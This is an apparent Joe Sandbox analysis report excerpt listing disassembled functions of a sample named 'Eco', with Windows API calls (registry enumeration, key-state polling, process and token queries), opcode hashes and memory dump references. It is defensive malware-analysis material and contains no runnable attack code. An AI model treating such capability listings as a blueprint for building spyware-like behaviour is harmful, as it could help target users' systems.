                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ErrorMode$InformationVolume__swprintf
                          • String ID: %lu
                          • API String ID: 3164766367-685833217
                          • Opcode ID: 99ca7ed2225e1e21d826bd300299418f576cedf96e99e78f54160e6b500f2723
                          • Instruction ID: cd907334781ee45e8d11f8754569c2b92cf07bdf1e6eb5d123115beccadb0ffb
                          • Opcode Fuzzy Hash: 99ca7ed2225e1e21d826bd300299418f576cedf96e99e78f54160e6b500f2723
                          • Instruction Fuzzy Hash: AB218134A00209AFCB10DB64D949EAEBBB8FF89314B108068F409D7291DB31AA45DB61
                          Function 0056A9E8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                            • Part of subcall function 0056A835: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0056A852
                            • Part of subcall function 0056A835: GetWindowThreadProcessId.USER32(?,00000000), ref: 0056A865
                            • Part of subcall function 0056A835: GetCurrentThreadId.KERNEL32 ref: 0056A86C
                            • Part of subcall function 0056A835: AttachThreadInput.USER32(00000000), ref: 0056A873
                          • GetFocus.USER32 ref: 0056AA0D
                            • Part of subcall function 0056A87E: GetParent.USER32(?), ref: 0056A88C
                          • GetClassNameW.USER32(?,?,00000100), ref: 0056AA56
                          • EnumChildWindows.USER32(?,0056AACE), ref: 0056AA7E
                          • __swprintf.LIBCMT ref: 0056AA98
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                          • String ID: %s%d
                          • API String ID: 1941087503-1110647743
                          • Opcode ID: 06eb54fc6414f2c55a6bfbba2000ddeb4c38db62393f513a8e353086b418e5a1
                          • Instruction ID: 1a0a5ac532fc11b591b7fff197a98ab6dec4298f430dfae7285f53c4a804b931
                          • Opcode Fuzzy Hash: 06eb54fc6414f2c55a6bfbba2000ddeb4c38db62393f513a8e353086b418e5a1
                          • Instruction Fuzzy Hash: FE117271600206ABDF11BFA09D8AFEA3F6CBF85700F044069BD18AB182DA705945DF71
                          Function 00572153 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 00572184
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                          • API String ID: 3964851224-769500911
                          • Opcode ID: 8b1889ac7ee8b342a6df14a10429953489aa31b9204f31f1c036d4fe3818c5f1
                          • Instruction ID: db1eb46d557caefb6bbce93ed65069d62bd410d494e949572d2c1b78ad78648c
                          • Opcode Fuzzy Hash: 8b1889ac7ee8b342a6df14a10429953489aa31b9204f31f1c036d4fe3818c5f1
                          • Instruction Fuzzy Hash: 2C118E30900119CFCF04EFA4D8659FEBBB4FFA5304F9095A8D829A7292DB325D16DB40
                          Function 0058F006 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                          Download Yara Rule
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0058F0B8
                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0058F0E8
                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0058F21B
                          • CloseHandle.KERNEL32(?), ref: 0058F29C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                          • String ID:
                          • API String ID: 2364364464-0
                          • Opcode ID: fc2593644249a3017c79084e6463db9d03262e43bff9a093eeadbe8e243a3916
                          • Instruction ID: bef23557570188b82d45216de4ba199fc30588f74ca8d2a6ba22e55b93c7ceb5
                          • Opcode Fuzzy Hash: fc2593644249a3017c79084e6463db9d03262e43bff9a093eeadbe8e243a3916
                          • Instruction Fuzzy Hash: E28162B56007019FE720EF68D84AF6ABBE5BF88710F14891DF959DB292D770AC808F51
                          Function 0059045F Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                            • Part of subcall function 00591242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005901D5,?,?), ref: 00591259
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00590525
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00590564
                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 005905AB
                          • RegCloseKey.ADVAPI32(?,?), ref: 005905D7
                          • RegCloseKey.ADVAPI32(00000000), ref: 005905E4
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                          • String ID:
                          • API String ID: 3440857362-0
                          • Opcode ID: 24e338a1104cfcb241cd33248701a108b9dbfbd2cd0dce3b9d3d96a5c8248662
                          • Instruction ID: b41241171b1a3c0675b9f3b2c89c20f0cbc91707633930b7cecf35ac0c1a0744
                          • Opcode Fuzzy Hash: 24e338a1104cfcb241cd33248701a108b9dbfbd2cd0dce3b9d3d96a5c8248662
                          • Instruction Fuzzy Hash: 43515771208205AFDB14EF64D885E6BBBE8BF85304F00591DF596872E1EB30E905CF52
                          Function 0057EA21 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0057EACF
                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0057EAF8
                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0057EB37
                            • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                            • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0057EB5C
                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0057EB64
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                          • String ID:
                          • API String ID: 1389676194-0
                          • Opcode ID: 9cb3d1fa9cb3d05fbfc1b8bbcaf53a02aeb21a4abc465f389d87f564f60e484c
                          • Instruction ID: 30bbc97a1e10459d31e98f16085d843db64c8a4679dcda0ed86e9d381198110a
                          • Opcode Fuzzy Hash: 9cb3d1fa9cb3d05fbfc1b8bbcaf53a02aeb21a4abc465f389d87f564f60e484c
                          • Instruction Fuzzy Hash: D5512875A00606DFDF01EF64D985AAEBBF5FF49310B148099E809AB3A1CB31AD51DF50
                          Function 0059A443 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2abb506cd694a3e5317cd92d7a5699d8e951795e39f219f580ea6c08063d15f2
                          • Instruction ID: b9ccde297851aaaaa1f7c5c19bdc86ebbbf5a78d80f7a1630e71ce4c88efb314
                          • Opcode Fuzzy Hash: 2abb506cd694a3e5317cd92d7a5699d8e951795e39f219f580ea6c08063d15f2
                          • Instruction Fuzzy Hash: 3841C335A00214AFDF20DF68CC48FA9BFA4FB4A310F150155E819A72D1D770AE55EAE2
                          Function 00512714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetCursorPos.USER32(?), ref: 00512727
                          • ScreenToClient.USER32(005D67B0,?), ref: 00512744
                          • GetAsyncKeyState.USER32(00000001), ref: 00512769
                          • GetAsyncKeyState.USER32(00000002), ref: 00512777
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AsyncState$ClientCursorScreen
                          • String ID:
                          • API String ID: 4210589936-0
                          • Opcode ID: 8731950a04a09b8407667a3ecc1937e5e857a0ec31bf4783b226a37dde0351d7
                          • Instruction ID: 89c7bdde049410b4b82ebd66db6a65681d4dbc051d75feec4c474df803dd1e03
                          • Opcode Fuzzy Hash: 8731950a04a09b8407667a3ecc1937e5e857a0ec31bf4783b226a37dde0351d7
                          • Instruction Fuzzy Hash: 9141813560910AFFDF159FA4C848AEABF74FB46324F10435AF868922D0C770A9A4DB90
                          Function 005693BA Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 005693CB
                          • PostMessageW.USER32(?,00000201,00000001), ref: 00569475
                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0056947D
                          • PostMessageW.USER32(?,00000202,00000000), ref: 0056948B
                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00569493
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessagePostSleep$RectWindow
                          • String ID:
                          • API String ID: 3382505437-0
                          • Opcode ID: dbbd87a4d9c9f67d4a1bdd54edd3c2a5ece6849eeba2152714678f367249aafe
                          • Instruction ID: 0819480cf137075aa14e80e66e9a7c15bccb27435a39415432dd92a2f06bd1d5
                          • Opcode Fuzzy Hash: dbbd87a4d9c9f67d4a1bdd54edd3c2a5ece6849eeba2152714678f367249aafe
                          • Instruction Fuzzy Hash: 8331BC71500219EBDF14CFA8D94CAAE3BB9FB45326F108229F925AB2D0C7B09915DB91
                          Function 0056BB68 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                          Download Yara Rule
                          APIs
                          • IsWindowVisible.USER32(?), ref: 0056BB80
                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0056BB9D
                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0056BBD5
                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0056BBFB
                          • _wcsstr.LIBCMT ref: 0056BC05
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                          • String ID:
                          • API String ID: 3902887630-0
                          • Opcode ID: 8814ef365048eb3fcba0a95eea723591641078076fe4e0a3217328ecf566abd0
                          • Instruction ID: 6940dfbfbcddfd0eb009e4bf4f888065947a916e65e435d9bfac316623792348
                          • Opcode Fuzzy Hash: 8814ef365048eb3fcba0a95eea723591641078076fe4e0a3217328ecf566abd0
                          • Instruction Fuzzy Hash: 3021F6322042057BFB255B399C49E7B7FA8FF85760F108129F805CB1A1EF71DD9196A0
                          Function 0059B538 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                          • GetWindowLongW.USER32(?,000000F0), ref: 0059B57F
                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0059B5A4
                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0059B5BC
                          • GetSystemMetrics.USER32(00000004), ref: 0059B5E5
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00581340,00000000), ref: 0059B603
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$Long$MetricsSystem
                          • String ID:
                          • API String ID: 2294984445-0
                          • Opcode ID: 7147396c56d257f60aa2d67bc1d3636e3d13958d1d43e7e638aaeee76dc5c12f
                          • Instruction ID: 10cc772bcbb6381138190d5556cf56296e5bf19705698d56a69f39b8a43aadff
                          • Opcode Fuzzy Hash: 7147396c56d257f60aa2d67bc1d3636e3d13958d1d43e7e638aaeee76dc5c12f
                          • Instruction Fuzzy Hash: 9F21B271911215AFEF209F39ED08B6A3FA5FB15321F124729F922D31E0E7309951DB80
                          Function 005116CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00511729
                          • SelectObject.GDI32(?,00000000), ref: 00511738
                          • BeginPath.GDI32(?), ref: 0051174F
                          • SelectObject.GDI32(?,00000000), ref: 00511778
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ObjectSelect$BeginCreatePath
                          • String ID:
                          • API String ID: 3225163088-0
                          • Opcode ID: b060e43c93b292341106413ea051987b13d45c6f367ef55890fcc3079144beb2
                          • Instruction ID: 38605ccff383bf32f32ee1c8535ec0590640ca43fd2bd1c6a3c8522fdca29c79
                          • Opcode Fuzzy Hash: b060e43c93b292341106413ea051987b13d45c6f367ef55890fcc3079144beb2
                          • Instruction Fuzzy Hash: A821AF70802608EBEB209F64DC487A97FF8FB20321F144257F910A22E0D77198DAFB95
                          Function 0056C61A Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memcmp
                          • String ID:
                          • API String ID: 2931989736-0
                          • Opcode ID: ccf6d9a3734ff45ed753548dec4ec52170de43b3d8f9947f7cc95f9ef3119a6b
                          • Instruction ID: 83c1a7d8f98d82f31dca60344352cc73f609756182b9916330d1389648b65eff
                          • Opcode Fuzzy Hash: ccf6d9a3734ff45ed753548dec4ec52170de43b3d8f9947f7cc95f9ef3119a6b
                          • Instruction Fuzzy Hash: 1501B1B2A0050A7BD2106669DD42FBB7F5CBE91398F009426FD49D7242EA60DE1086BC
                          Function 00574EBB Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00574EE2
                          • __beginthreadex.LIBCMT ref: 00574F00
                          • MessageBoxW.USER32(?,?,?,?), ref: 00574F15
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00574F2B
                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00574F32
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                          • String ID:
                          • API String ID: 3824534824-0
                          • Opcode ID: 1a803fd04d9524a90b3edeebd0111f4dbd7a62176e21abc6be861cc58f05238d
                          • Instruction ID: ed04378706c333bda179b6fb85f5792ac201295afe7d89d3810d6766d6d82011
                          • Opcode Fuzzy Hash: 1a803fd04d9524a90b3edeebd0111f4dbd7a62176e21abc6be861cc58f05238d
                          • Instruction Fuzzy Hash: 3F11C8B6905244BFC7119FACAC08ADE7FACFB56321F144257F818D33A0D77589089BA0
                          Function 00568C03 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00568C1F
                          • GetLastError.KERNEL32(?,005686E3,?,?,?), ref: 00568C29
                          • GetProcessHeap.KERNEL32(00000008,?,?,005686E3,?,?,?), ref: 00568C38
                          • HeapAlloc.KERNEL32(00000000,?,005686E3,?,?,?), ref: 00568C3F
                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00568C56
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                          • String ID:
                          • API String ID: 842720411-0
                          • Opcode ID: 6764b2f40e01c56886c00b1e46e8204bb904755989e07188c313fccc77230fe0
                          • Instruction ID: 446af70facfd8abd6cd1e90fd1bc7d6ba536ed6e8031a1062c4d5b9abb2c351e
                          • Opcode Fuzzy Hash: 6764b2f40e01c56886c00b1e46e8204bb904755989e07188c313fccc77230fe0
                          • Instruction Fuzzy Hash: EA016D70651204BFEB205FA5EC88DBB7FACFF9A754B100529F848C7260DA318D94DA70
                          Function 00567B0B Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                          Download Yara Rule
                          APIs
                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567A45,80070057,?,?,?,00567E56), ref: 00567B28
                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567A45,80070057,?,?), ref: 00567B43
                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567A45,80070057,?,?), ref: 00567B51
                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567A45,80070057,?), ref: 00567B61
                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567A45,80070057,?,?), ref: 00567B6D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: From$Prog$FreeStringTasklstrcmpi
                          • String ID:
                          • API String ID: 3897988419-0
                          • Opcode ID: 66ef6ad8c44a90485f83ed4479aeb0aeb02e5d1e6eba9a373ffd4eed8f966b52
                          • Instruction ID: ce84d8478573830bd66a7b7ed2054f050468f7335a0f8bfab690b30afc5c5495
                          • Opcode Fuzzy Hash: 66ef6ad8c44a90485f83ed4479aeb0aeb02e5d1e6eba9a373ffd4eed8f966b52
                          • Instruction Fuzzy Hash: 30017876611209BBDB114F64EC48AAA7FADFF88756F101068F908D3260F735DD40EBA4
                          Function 00568AAA Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00568AC1
                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00568ACB
                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00568ADA
